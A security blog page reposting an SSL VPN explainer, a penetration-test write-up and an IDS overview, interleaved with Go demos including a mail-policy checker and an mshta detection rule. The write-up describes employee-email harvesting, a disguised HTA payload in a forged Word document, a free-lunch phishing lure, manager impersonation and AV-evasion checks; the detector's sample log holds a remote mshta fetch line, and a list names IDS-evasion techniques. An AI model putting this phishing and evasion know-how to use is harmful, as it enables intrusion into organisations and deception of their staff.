Monday 23 October 2017

Understanding SSL VPN

What if you are sitting in a hotel room, hundreds of miles away from your office and you need to access the intranet portal of your company? One of the solutions is to publish this portal on the web, so that all employees can access this application from anywhere. But often, there are multiple intranet applications used by different business groups of the company. Publishing all these applications directly on the web can expose the company to multiple security risks as they become accessible to everyone on the Internet. In addition, some of the applications may not be web-based.
The most common practice adopted by enterprises in such a scenario is to use a Virtual Private Network (VPN). The two most widely used forms of VPN are IPSEC VPN and SSL VPN. In this article, we discuss how SSL VPN works, its key advantages and a few concerns about it.

What is "SSL VPN"

In a nutshell, a Virtual Private Network (VPN) is a technology that allows creating a private, secure network over a public network such as the Internet. This is achieved by establishing a secure tunnel between the user’s machine and the enterprise network after authenticating the user. This enables enterprises to give mobile employees access to the internal network without compromising on security. Secure VPNs are one type of VPN; they use tunneling protocols with cryptographic capabilities. Secure Sockets Layer (SSL) is one such protocol, used to provide confidentiality and authenticity while communicating over the Internet. As the name indicates, an SSL VPN uses the SSL protocol to secure the VPN tunnels.

How SSL VPN Works


Figure 1. SSL VPN setup of ABC Company
Figure 1 shows an SSL VPN setup of an ABC Company. myvpn.abc.com is the SSL VPN gateway: all VPN connections from the Internet are accepted by this gateway, which in turn initiates connections to the internal application servers. Firewall-A protects the internal application servers and allows connections only from the SSL VPN gateway, and only to the required application services. Firewall-B is the outside firewall and is configured to allow any Internet machine to connect to the SSL VPN gateway on the SSL port (TCP/443). The purpose of this SSL VPN infrastructure is to give the company’s mobile employees secure access to the application servers over the Internet.
Let’s consider John is a sales executive of this company who is currently out of office. John has access to internet and wants to access the web-based sales portal on the company’s intranet.
In order to connect to the intranet portal, John opens his browser, types https://myvpn.abc.com and connects to the SSL VPN gateway. The gateway asks John for his username and password. Upon successful authentication, the gateway presents him with the list of applications that sales executives of the company need to access. John clicks on the sales portal application in that list. At the same time, the gateway initiates a connection to the internal sales application server through Firewall-A. When the gateway receives the response from the application server, it encapsulates that response in SSL and sends it over the connection established by John. Thus, the SSL VPN tunnel is established between the SSL VPN gateway and John’s machine. The key point here is that the SSL tunnel exists only up to the SSL VPN gateway and not up to the application server.
While this mechanism works well for Web traffic, different SSL VPN vendors have used different approaches of implementation for non-web traffic. Let’s look at two of the most commonly used approaches.
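The web-traffic flow above is worth seeing in running code, because the property that matters for threat modeling (the TLS tunnel ends at the gateway; the hop from gateway to application server is plaintext) is easy to assume away. The following is an added Go example, not code from the original article or from any SSL VPN product. It stands up three parties on loopback: an internal "sales portal" that speaks plain TCP, a gateway that terminates TLS under the page's hostname myvpn.abc.com and relays requests onward in the clear, and a client that connects over TLS. The certificate is self-signed and generated at run time so the demo works offline; the addresses, the request text and the reply format are constructed for the example.

```go
package main

import (
	"bufio"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"strings"
	"time"
)

// Gateway hostname from the page; every address and key below is constructed.
const gatewayName = "myvpn.abc.com"

// selfSignedCert makes a throwaway certificate so the demo runs offline;
// a real gateway would present a CA-issued certificate.
func selfSignedCert() (tls.Certificate, *x509.CertPool, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return tls.Certificate{}, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: gatewayName},
		DNSNames: []string{gatewayName}, IsCA: true, BasicConstraintsValid: true,
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(time.Hour),
		KeyUsage:    x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return tls.Certificate{}, nil, err
	}
	leaf, _ := x509.ParseCertificate(der)
	pool := x509.NewCertPool()
	pool.AddCert(leaf)
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key, Leaf: leaf}, pool, nil
}

// serveOnce accepts one connection, reads one request line and hands it to handle.
func serveOnce(ln net.Listener, handle func(c net.Conn, line string)) {
	c, err := ln.Accept()
	if err != nil {
		return
	}
	defer c.Close()
	if line, err := bufio.NewReader(c).ReadString('\n'); err == nil {
		handle(c, strings.TrimSpace(line))
	}
}

// RunDemo plays John's request through the tunnel and returns the reply he
// receives plus the request exactly as the internal app server saw it.
func RunDemo(request string) (reply, seenByApp string, err error) {
	cert, pool, err := selfSignedCert()
	if err != nil {
		return "", "", err
	}
	// Internal sales portal behind Firewall-A: plain TCP, no TLS at all.
	seen := make(chan string, 1)
	app, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return "", "", err
	}
	defer app.Close()
	go serveOnce(app, func(c net.Conn, line string) {
		seen <- line // the app server observes cleartext
		fmt.Fprintf(c, "sales portal: %s\n", line)
	})
	// SSL VPN gateway: the TLS tunnel terminates here, then it relays in the clear.
	gw, err := tls.Listen("tcp", "127.0.0.1:0", &tls.Config{Certificates: []tls.Certificate{cert}})
	if err != nil {
		return "", "", err
	}
	defer gw.Close()
	go serveOnce(gw, func(c net.Conn, line string) {
		back, err := net.Dial("tcp", app.Addr().String()) // plaintext hop through Firewall-A
		if err != nil {
			return
		}
		defer back.Close()
		fmt.Fprintf(back, "%s\n", line)
		r, _ := bufio.NewReader(back).ReadString('\n')
		fmt.Fprint(c, r) // re-encrypted by the TLS connection on its way back to John
	})
	// John's browser: TLS to the gateway, verifying it as myvpn.abc.com.
	conn, err := tls.Dial("tcp", gw.Addr().String(), &tls.Config{RootCAs: pool, ServerName: gatewayName})
	if err != nil {
		return "", "", err
	}
	defer conn.Close()
	fmt.Fprintf(conn, "%s\n", request)
	r, err := bufio.NewReader(conn).ReadString('\n')
	if err != nil {
		return "", "", err
	}
	return strings.TrimSpace(r), <-seen, nil
}
```

`RunDemo("GET /sales-portal")` returns the reply John sees and, separately, the unencrypted request the application server received; the two strings agree because the gateway decrypted the request before forwarding it. In a real deployment that plaintext hop is why Firewall-A must admit only the gateway, and why the gateway host itself belongs in the trust boundary.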

Forwarding of Traffic sent to specific ports

The SSL VPN gateway transfers a script or an applet to the user’s machine that makes it listen for requests to specific IP addresses and TCP/UDP ports and intercept them when they are made. It sends the contents of those requests to the SSL VPN gateway through the SSL VPN tunnel, after which the gateway resends them to the actual destination on the internal network.

Establishing Network Connectivity over SSL

In order to establish the connection, the SSL VPN gateway transfers a small program (typically an ActiveX Control or Java applet) to the user’s machine and thereby creates a virtual network adapter on the user’s machine. It then assigns the user’s machine a private IP address and uses the SSL tunnel to establish a network connection between the company’s internal network and the user’s machine.

Figure 2. SSL packet with additional headers
As shown in Figure 2, the packet created by the virtual network adapter is encrypted using SSL, encapsulated by new headers and then sent over the public network.
Using SSL VPN for non-web traffic, users can access network shares and remote desktop, and administrators can use SSH or telnet over SSL to manage their systems remotely.

Key Advantages

While discussing the pros and cons of SSL VPN, we mainly compare it with the other predominant VPN technology, which is IPSEC (IP Security) VPN. IPSEC is an encryption protocol that works at the network layer.
  • Unlike IPSEC VPN, SSL VPN doesn’t require installation and configuration of client software at the user end. You just need an internet browser to use SSL VPN. This in turn provides flexibility to use SSL VPN from any platform – Mac OS X, Windows, UNIX or any device like PC, Web-enabled phones, PDAs, etc.
  • SSL VPN solutions provide granular access control per application. One can define which user groups have what level of access to which applications.
  • SSL uses TCP port 443, which is normally already open on the firewall. This also helps remote users who are sitting behind another company’s firewall. IPSEC uses specific UDP ports, which firewalls block when they are not in use.

Few Concerns

  • If the SSL VPN is configured for non-web traffic, viruses and worms may infect the company’s internal network from an insecure public terminal.
  • Third-party search tools (like Google Desktop) cache the web pages served by the SSL VPN gateway. This poses a serious security concern even for SSL VPN products that erase temporary data after each SSL VPN session completes: data cached by search tools, and the index information such tools create, may persist in the search engine’s proprietary data stores.
  • Hackers may bridge to corporate network through the SSL VPN user’s machine.

Sunday 22 October 2017

How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information

Black-box Penetration Testing
The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, aside from the company name, we were given “ZERO” information to perform an external black-box penetration test.
This black-box external penetration test was performed for a client called Hackme.

OSINT 101

We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a number of open source intelligence tools – to assist in gathering emails, subdomains, hosts, employee names, etc. from different public sources like search engines and Shodan. There is an exhaustive list of such awesome tools here.
Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization.
With Google dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” .
Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.
From this, I noticed that employee emails followed a particular naming convention – the first letter of the first name + surname @ domain.com, i.e. rakinyele@hackme.com.
Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:
site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.
By hacking a script to automate the process, we copied out the firstnames, lastnames and the roles of the current employees of Hackme.
A tiring approach is to manually crawl through the google pages in search for these names and role or one could also use GoogleScraper:

Result:

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.
Then, using your favorite word processor (word merge, Notepad++, etc.) or some good scriptful skills, merge the first name + last name to form your email list.

Feed our Target list a Payload

Since we are simulating a black-box external attack, we decided (just like what an attacker would do) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via emails to employees of Hackme.
We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.
This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.
What made it really stand out asides the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan local network for open SMB, pivot to another machine, load mimikatz and a lot more.
So we ran Koadic and set the necessary variables – using the “stager/js/mshta” module (serves payloads in memory using MSHTA.exe HTML Applications).
The result was a spawn of our HTA payload URL as evidenced in the screenshot above. However, we need our targets to execute our payload as “mshta payload_url”.
In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.
Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.
Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCC group have this implemented in Demiguise.
So here is our final payload saved as a .hta file.
The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

  1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
  2. Get the user to open the word document and the embedded OLE object.
  3. This spawns a new process and we get a shell access into our victim’s PC.
Now we get to the interesting part, we need our victim to open the Microsoft word document and our payload.
To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees’ behavior. The question we kept asking ourselves was: what would interest the employees?
Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.
After poring through reviews of Hackme on Glassdoor, we found some common themes:

  1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.
  2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man’s heart is through his stomach. So what better way to get the employees to open our payload embedded word document?
Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.
Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal, complete with Hackme email signature, while observing the organization’s email culture.
Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the response.

… recon again???

We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

We are halfway through sending our payload now. Have some patience and read on…

It’s time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like.
I then created a new Word document like the one shown below, a spitting image of the Hackme document template with appropriate headers/footers.
Then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.


Don’t Forget the Anti-virus!!!

To check the AV detection rate of our payload – and to see if it would be flagged as malicious by Hackme’s antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because, according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file.
AV Scan of our .hta payload (0 detections)

It’s Time to Send our Email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address.
In this case, I created a Gmail account (yes, Gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature which was gotten earlier.
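The sentence above names the three records that decide whether a spoofed sender address gets through, and the natural defender's check is to read your own domain's published policy and ask whether it would actually reject such mail. The following is an added Go example, not code from the original write-up. It parses the two records a plain DNS TXT lookup exposes (SPF and DMARC; DKIM keys live under a per-selector name and are not covered) and turns them into findings. The record strings passed to `Assess` are constructed inputs; a caller would fetch the real ones for its domain, for example with a DNS library or `dig TXT`.

```go
package main

import (
	"strings"
)

// MailAuthPosture summarizes what a domain's published SPF and DMARC records
// say about mail that claims to come from it.
type MailAuthPosture struct {
	SPFPresent   bool
	SPFAllQual   string // qualifier on "all": "-" fail, "~" softfail, "?" neutral, "+" pass, "" absent
	DMARCPresent bool
	DMARCPolicy  string // value of the p= tag: none, quarantine, reject, or "" if no record
	Findings     []string
}

// ParseSPF reports whether txt is an SPF record and which qualifier its final
// "all" mechanism carries; that qualifier decides the fate of unlisted senders.
func ParseSPF(txt string) (ok bool, allQual string) {
	fields := strings.Fields(txt)
	if len(fields) == 0 || !strings.EqualFold(fields[0], "v=spf1") {
		return false, ""
	}
	for _, f := range fields[1:] {
		q := "+" // an unqualified mechanism means pass
		if strings.ContainsAny(f[:1], "+-~?") {
			q, f = f[:1], f[1:]
		}
		if strings.EqualFold(f, "all") {
			return true, q
		}
	}
	return true, "" // no "all" at all: unlisted senders end in an implicit neutral
}

// ParseDMARC returns the tag/value pairs of a "v=DMARC1; p=...; ..." record.
func ParseDMARC(txt string) (map[string]string, bool) {
	tags := map[string]string{}
	for _, kv := range strings.Split(txt, ";") {
		parts := strings.SplitN(strings.TrimSpace(kv), "=", 2)
		if len(parts) == 2 {
			tags[strings.ToLower(strings.TrimSpace(parts[0]))] = strings.TrimSpace(parts[1])
		}
	}
	if !strings.EqualFold(tags["v"], "DMARC1") {
		return nil, false
	}
	return tags, true
}

// Assess turns the two TXT records into findings a mail administrator can act on.
func Assess(spfTXT, dmarcTXT string) MailAuthPosture {
	var p MailAuthPosture
	p.SPFPresent, p.SPFAllQual = ParseSPF(spfTXT)
	if tags, ok := ParseDMARC(dmarcTXT); ok {
		p.DMARCPresent, p.DMARCPolicy = true, strings.ToLower(tags["p"])
	}
	switch {
	case !p.SPFPresent:
		p.Findings = append(p.Findings, "no SPF record: any host may send as this domain")
	case p.SPFAllQual != "-":
		p.Findings = append(p.Findings, "SPF does not end in -all: unlisted senders are not hard-failed")
	}
	switch {
	case !p.DMARCPresent:
		p.Findings = append(p.Findings, "no DMARC record: receivers get no policy for failed alignment")
	case p.DMARCPolicy != "reject" && p.DMARCPolicy != "quarantine":
		p.Findings = append(p.Findings, "DMARC p="+p.DMARCPolicy+": spoofed mail is only monitored, not blocked")
	}
	return p
}
```

`Assess("v=spf1 include:_spf.example.com ~all", "v=DMARC1; p=none; rua=mailto:dmarc@example.com")` yields two findings (softfail SPF and a monitor-only DMARC policy), while `Assess("v=spf1 ip4:192.0.2.10 -all", "v=DMARC1; p=reject")` yields none. Note that a look-alike address registered at a free mail provider, as in the write-up, is not caught by any of these records; that case is a matter of user awareness and inbound filtering of display-name impersonation.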

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!
What next?
The rest they often say is history. From here-on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins etc.
In conclusion
All in all, this was a very fun engagement. Whilst it may take an attacker a month, two months or a year of dedication to break into an organization through a loophole at the infrastructure level, it can be fairly easy to gain access by exploiting the human factor.
The moral of the exercise is: Recon, recon and more recon – for a wise man once said.
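The write-up's own worry that "this organization's blue team may flag" a payload launched through mshta.exe is the defender's starting point: a document handler spawning a script host, or mshta.exe being handed a URL, is telemetry most environments already collect. The following is an added Go example, not code from the original write-up or from any EDR product. It runs two such rules over constructed process-creation records using the Image / ParentImage / CommandLine fields that Sysmon Event ID 1 and similar telemetry carry; the " | "-separated key=value line format, the host name, user and URL in `sampleLog` are all made up for the example.

```go
package main

import (
	"path/filepath"
	"strings"
)

// ProcEvent is a minimal process-creation record: the Image / ParentImage /
// CommandLine trio that Sysmon Event ID 1 and most EDR telemetry provide.
type ProcEvent struct {
	Image, ParentImage, CommandLine string
}

// Alert pairs the rule that fired with the event that triggered it.
type Alert struct {
	Rule  string
	Event ProcEvent
}

// Document handlers that have no business launching script hosts.
var officeApps = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true, "outlook.exe": true}

// Built-in interpreters routinely used to run a dropped or fetched payload.
var scriptHosts = map[string]bool{"mshta.exe": true, "wscript.exe": true, "cscript.exe": true, "powershell.exe": true}

// exe returns the lower-cased file name of a Windows path (works on any OS).
func exe(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
}

// Detect applies two rules to one event:
//  1. an Office process spawning a script host (the embedded-object chain
//     described in the write-up);
//  2. mshta.exe handed a URL, i.e. an HTA pulled from the network rather
//     than opened from disk.
func Detect(e ProcEvent) []Alert {
	var out []Alert
	img, parent := exe(e.Image), exe(e.ParentImage)
	if officeApps[parent] && scriptHosts[img] {
		out = append(out, Alert{"office-spawns-script-host", e})
	}
	if img == "mshta.exe" {
		cl := strings.ToLower(e.CommandLine)
		if strings.Contains(cl, "http://") || strings.Contains(cl, "https://") {
			out = append(out, Alert{"mshta-remote-hta", e})
		}
	}
	return out
}

// ParseLine reads one record in the constructed " | "-separated key=value
// format used by sampleLog below; real telemetry would be XML or JSON.
func ParseLine(line string) ProcEvent {
	var e ProcEvent
	for _, field := range strings.Split(line, " | ") {
		kv := strings.SplitN(field, "=", 2)
		if len(kv) != 2 {
			continue
		}
		switch kv[0] {
		case "Image":
			e.Image = kv[1]
		case "ParentImage":
			e.ParentImage = kv[1]
		case "CommandLine":
			e.CommandLine = kv[1]
		}
	}
	return e
}

// Scan runs Detect over every line and collects the alerts in order.
func Scan(lines []string) []Alert {
	var all []Alert
	for _, l := range lines {
		all = append(all, Detect(ParseLine(l))...)
	}
	return all
}

// sampleLog is constructed test data; host, user and URL are placeholders.
var sampleLog = []string{
	`Image=C:\Windows\System32\mshta.exe | ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE | CommandLine=mshta http://203.0.113.5/lunch.hta`,
	`Image=C:\Windows\System32\mshta.exe | ParentImage=C:\Windows\explorer.exe | CommandLine=mshta C:\Users\jdoe\Desktop\menu.hta`,
	`Image=C:\Windows\System32\notepad.exe | ParentImage=C:\Windows\explorer.exe | CommandLine=notepad.exe`,
	`Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage=C:\Program Files\Microsoft Office\EXCEL.EXE | CommandLine=powershell -w hidden`,
}
```

`Scan(sampleLog)` returns three alerts: the first record trips both rules, the second (a local .hta opened from Explorer) trips neither as written, and the fourth trips the parent/child rule. Whether mshta.exe with a local file should alert too is a tuning decision; in most enterprise fleets any mshta.exe execution is rare enough to be worth a ticket.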
Original Source & Credits: 
Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.

Disclaimer

All the content of this article belongs to the above original author. “www.computernetworksecuritis.blogspot.in” won’t take any credit. This article is only for an educational purpose. Any actions and/or activities related to the material contained within this website are solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question.


The “Author” and “www.computernetworksecuritis.blogspot.in” will not be held responsible in the event any criminal charges are brought against any individuals misusing the information in this website to break the law. Reproducing this content without permission is strictly prohibited.

Intrusion-Detection-System (IDS) And Its Detailed Working Function -SOC/SIEM

An intrusion detection system (IDS) gathers and analyzes information from within a computer or network to identify unauthorized access, misuse and possible violations.
An IDS can also be thought of as a packet sniffer that intercepts packets travelling over various communication media; all captured packets are analyzed after capture.

HOW IDS WORKS

The main purpose of an IDS is not only to prevent intrusions but also to alert administrators immediately while an attack is going on.

  • An IDS has sensors that detect signatures; some advanced IDSes also analyze behavior to identify malicious activity, so even when no signature matches, the system can flag the behavior of an attack.
  • If a signature matches, the packet either moves to the next step or the connection from the source IP is cut, the packet is dropped and an alarm notifies the administrator.
  • Once the signature stage is passed, the sensors hand the packet to anomaly detection, which checks whether the received packet or request matches the expected profile.
  • If the packet passes the anomaly stage, a stateful protocol analysis is done. After that, the packets are passed on to the network through the switch. If anything mismatches at this stage, the connection from the source IP address is cut, the packet is dropped and an alarm is raised to notify the administrator.

WAYS TO DETECT AN INTRUSION 

Intrusion can be identified in three ways.

Signature Detection:

Also known as misuse detection, it tries to identify events that indicate abuse of the system. This is achieved by creating models of intrusions.
Incoming events are compared with the intrusion models for detection and decision. While building a signature, the model should detect the incoming intrusion without affecting regular traffic: only malicious traffic should match the model, otherwise false alarms will be raised.
  • The simplest form of signature recognition uses simple pattern matching to compare network packets against binary signatures of known attacks. A binary signature is defined as a specific portion of the packet, such as the TCP flags.
  • Signature recognition can find known attacks, but other packets that happen to match the same signature will trigger bogus alerts. Signatures need to be customized.
  • A signature that is defined improperly may trigger bogus alerts, and network bandwidth is consumed as the signature database grows.
  • Despite the problems with signature-based intrusion detection, such systems are popular and work well when configured correctly and monitored closely.

Anomaly Detection

It is termed “not-use detection” and it differs from the signature recognition model. The model consists of a database of anomalies; any event that is identified against the database is called an anomaly, and any deviation from normal use is considered an attack.
  • In this traditional method, important data is kept for checking in various network traffic models. However, in reality there is little variation in network traffic and too many statistical variations, making these models imprecise.
  • In this type of approach, the inability to train a model thoroughly on the normal network is of grave concern.

Protocol Anomaly detection

This technique is based on anomalies specific to a protocol; this model was integrated with IDSes only recently. It identifies TCP/IP-specific flaws in the network. Protocols are created with specifications, known as RFCs (e.g. RFC1192), that dictate proper use and communication.
  • New attack methods and exploits that violate protocol standards are discovered frequently.
  • The pace at which malicious signatures grow is incredibly fast, whereas network protocols are well defined and change slowly. Therefore a signature database must be updated frequently to detect attacks.
  • Protocol anomaly detection systems are easier to use because they require no signature updates.
  • The best way to present alarms is to explain which part of the protocol state machine was compromised. For this, IDS operators need a thorough knowledge of the protocol design; the best source is the documentation provided by the IDS.
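The three detection methods above, and the sensor pipeline described under "HOW IDS WORKS" (signature stage, then anomaly stage, then protocol analysis, dropping and alarming on any hit), fit in a small simulation. The following is an added Go example, not code from the original article or from any IDS product. It models a sensor with a byte-pattern signature (the "binary signature" of the text), a per-source packet baseline for anomaly detection, and two RFC 793 flag-combination checks for protocol anomaly detection, then runs constructed packets through all three stages in the page's order. The packet structure, the signature, the baseline threshold and the sample traffic are all assumptions made for the example.

```go
package main

import (
	"bytes"
	"fmt"
)

// Packet is a constructed, minimal view of a captured TCP segment.
type Packet struct {
	Src     string
	DstPort int
	Flags   uint8 // TCP flag bits: FIN=0x01 SYN=0x02 RST=0x04 PSH=0x08 ACK=0x10
	Payload []byte
}

const (
	FIN uint8 = 0x01
	SYN uint8 = 0x02
	RST uint8 = 0x04
	ACK uint8 = 0x10
)

// Signature is a misuse-detection model: a port plus a byte pattern that
// only malicious traffic should carry (the text's "binary signature").
type Signature struct {
	Name    string
	DstPort int // 0 = any port
	Content []byte
}

// Verdict is what the sensor decides for one packet.
type Verdict struct {
	Drop    bool
	Reasons []string
}

// Sensor holds the three detection stages and the per-source baseline used
// by the anomaly stage.
type Sensor struct {
	Sigs      []Signature
	MaxPerSrc int            // packets per source beyond which traffic is anomalous
	seen      map[string]int // packets observed per source (the "normal use" profile)
}

func NewSensor(sigs []Signature, maxPerSrc int) *Sensor {
	return &Sensor{Sigs: sigs, MaxPerSrc: maxPerSrc, seen: map[string]int{}}
}

// signatureStage: simple pattern matching against known-bad content.
func (s *Sensor) signatureStage(p Packet) []string {
	var hits []string
	for _, sig := range s.Sigs {
		if (sig.DstPort == 0 || sig.DstPort == p.DstPort) && bytes.Contains(p.Payload, sig.Content) {
			hits = append(hits, "signature:"+sig.Name)
		}
	}
	return hits
}

// anomalyStage: deviation from the learned per-source rate counts as an attack.
func (s *Sensor) anomalyStage(p Packet) []string {
	s.seen[p.Src]++
	if s.seen[p.Src] > s.MaxPerSrc {
		return []string{fmt.Sprintf("anomaly:%s exceeded %d packets", p.Src, s.MaxPerSrc)}
	}
	return nil
}

// protocolStage: TCP flag combinations that RFC 793 never produces.
func (s *Sensor) protocolStage(p Packet) []string {
	switch {
	case p.Flags&SYN != 0 && p.Flags&FIN != 0:
		return []string{"protocol:SYN+FIN set together"}
	case p.Flags == 0:
		return []string{"protocol:null scan (no flags)"}
	}
	return nil
}

// Inspect runs the stages in the order the text gives and drops on any hit.
func (s *Sensor) Inspect(p Packet) Verdict {
	var v Verdict
	v.Reasons = append(v.Reasons, s.signatureStage(p)...)
	v.Reasons = append(v.Reasons, s.anomalyStage(p)...)
	v.Reasons = append(v.Reasons, s.protocolStage(p)...)
	v.Drop = len(v.Reasons) > 0
	return v
}

// RunSample feeds constructed traffic through a sensor and returns the verdicts.
func RunSample() []Verdict {
	s := NewSensor([]Signature{{"web-traversal", 80, []byte("../../etc/passwd")}}, 3)
	pkts := []Packet{
		{"198.51.100.7", 80, ACK, []byte("GET /index.html HTTP/1.1")},
		{"198.51.100.7", 80, ACK, []byte("GET /../../etc/passwd HTTP/1.1")},
		{"203.0.113.9", 22, SYN | FIN, nil},
		{"203.0.113.9", 23, 0, nil},
		{"203.0.113.9", 25, SYN, nil},
		{"203.0.113.9", 80, SYN, nil}, // fourth packet from this source: over the baseline
	}
	var out []Verdict
	for _, p := range pkts {
		out = append(out, s.Inspect(p))
	}
	return out
}
```

`RunSample()` passes the first packet, drops the second on the signature, drops the third and fourth on protocol anomalies, passes the fifth, and drops the sixth purely on the per-source baseline even though its flags and payload are unremarkable. The ordering matters for the false-alarm discussion above: a signature hit is reported before the anomaly counter is consulted, so a tightly written signature does not inflate the baseline's alarms.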

TYPES OF INTRUSION DETECTION

  • Network based intrusion detection
  • Host based intrusion detection
  • Log file monitoring
  • File Integrity Check.

Network based Intrusion

A NIDS checks every packet entering the network for anomalies and incorrect data. Unlike a firewall, which is confined to filtering malicious packets, an IDS inspects every packet thoroughly.
A NIDS captures and inspects all traffic regardless of whether it is permitted. Based on the content, at either the application or the IP level, an alert is generated.
Network-based intrusion detection systems tend to be more distributed than host-based ones. A NIDS is designed basically to identify anomalies at the network and host level.
It audits the information contained in data packets and logs information about malicious packets.
A threat level is assigned to each data packet after it is received. These mechanisms typically consist of a black box placed on the network in promiscuous mode, listening for patterns indicative of an intrusion.

Host based Intrusion

In the host-based system, the IDS analyzes each system’s behavior. The HIDS can be installed on any system ranging from a desktop PC to a server. The HIDS is more versatile than the NIDS.
One example of a host-based system is a program that operates on a system and receives an application or operating system audit logs.
These programs are highly effective for detecting insider abuses. If one of the users attempts unauthorized activity, the host-based system logs and collects the most pertinent information promptly.
In addition to detecting unauthorized insider activity, host-based systems are also effective at detecting unauthorized file modification.
HIDSes are more focused on changing aspects of the local systems. A HIDS is also more platform-centric, with more focus on the Windows OS, but there are HIDSes for UNIX platforms too. These mechanisms usually include auditing for events that occur on a specific host. They are not as common, due to the overhead they incur by having to monitor each system event.

Log File Monitoring

A Log File Monitor (LFM) monitors log files created by network services. The LFM IDS searches through the logs and identifies malicious events.
In a similar manner to a NIDS, these systems look for patterns in the log files that suggest an intrusion. These mechanisms are typically programs that parse log files after an event has already occurred, such as failed login attempts.

File Integrity Check

These mechanisms check for Trojan horses, or files that have otherwise been modified, indicating an intruder has already been there.

IDS PENTESTING

  1. Perform a Time-To-Live attack.
  2. Perform the invalid RST packets technique.
  3. Perform the urgency flag technique.
  4. Perform the polymorphic shellcode technique.
  5. Perform the ASCII shellcode technique.
  6. Perform Application-layer attacks.
  7. Perform encryption and flooding techniques.
  8. Perform a post-connection SYN attack.
  9. Perform a pre-connection SYN attack.

4 Best Intrusion Detection Systems

Snort

Snort is an open source network intrusion prevention and detection system (IDS/IPS) created by Martin Roesch and put out by Sourcefire (acquired by Cisco in 2013).
The best deal for the money (it’s free). It does an amazing job of combining the benefits of signature, protocol, and anomaly-based inspection. Snort is without a doubt the most widely deployed IDS/IPS technology across the globe, with millions of downloads and approximately 300,000 registered users.

Bro Intrusion Detection System

Bro is an open-source, Unix-based Network Intrusion Detection System (NIDS) that passively monitors network traffic and looks for suspicious activity.
Bro detects intrusions by first parsing network traffic to extract its application-level semantics and then executing event-oriented analyzers that compare the activity with patterns deemed troublesome.
Its analysis includes detection of specific attacks (including those defined by signatures, but also those defined in terms of events) and unusual activities (for example, certain hosts connecting to certain services, or patterns of failed connection attempts).

Cisco Intrusion Prevention System (IPS)

Besides being one of the most expensive, Cisco IPS is one of the most widely deployed intrusion prevention systems thanks to Cisco’s acquisition of Sourcefire. The company’s Firepower network security appliances are based on Snort.
Cisco offers protection against more than 30,000 known threats, timely signature updates, and Cisco Global Correlation to dynamically recognize, evaluate, and stop emerging Internet threats.
Cisco IPS includes industry-leading research and the expertise of Cisco Security Intelligence Operations.
